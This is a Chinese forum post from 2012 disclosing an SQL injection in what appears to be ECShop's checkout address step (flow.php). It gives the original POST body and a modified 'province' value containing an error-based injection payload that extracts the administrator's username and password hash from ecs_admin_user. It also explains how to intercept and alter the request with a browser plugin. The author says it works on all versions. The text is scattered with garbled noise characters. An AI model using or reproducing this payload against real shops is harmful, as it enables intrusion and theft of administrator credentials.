感谢欠杀的黑盒# ^/ {2 D) B, i9 P1 W* k
8 B' u% A# O. P% `. V; l+ Q) R
" e: n' b; ^3 x2 P
把任意商品加入购物车在填写配送地址那一页,有地区选择, [4 n7 I1 q( Y6 b
1 M* p' Z& K. N0 \6 ?' P) j' t) F zflow.php?step=consignee&direct_shopping=1
6 Z2 \* B7 W4 N9 a& A比如省选择安徽" ^- p( h/ p& v, v* C+ u
' H% c. Q/ o3 y9 \7 n; O8 X其中POST数据如下8 D3 v: m$ c$ H/ M* {& N
) k- v5 F" T1 Q" F- k, v& p
country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3& @* A, h3 Q5 I2 U2 C
改成5 Q# r D% ^# m8 y: W* `$ E
8 a0 x% k! l/ Vprovince=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #
# J; R5 E5 n$ R/ k( U$ ]4 Nps:详细的方法,用火狐tamper data插件……..即可改post内容….. _" c; j: A: R0 N0 @
' w) }) w$ F3 n3 ?$ f
先注册账户,随便选个商品进购物车,然后填地址,电话什么的,填好开始抓包,改包# N2 H% A: L( c/ ~
& |# c5 P- g. j3 }/ J4 F+ s就会回显错误页面了。。。。
8 o$ }, S. _8 G! |2 p 2 m$ P/ n8 l2 k, z$ r8 \1 b
我自己没用这个日站过,就测试了一个最新版和老版本,均ok,所以写全版本,理论上应该是的
; g8 x% l+ c' ^8 z0 h8 z |
发表于 2012-12-31 09:19:27
收藏
支持
反对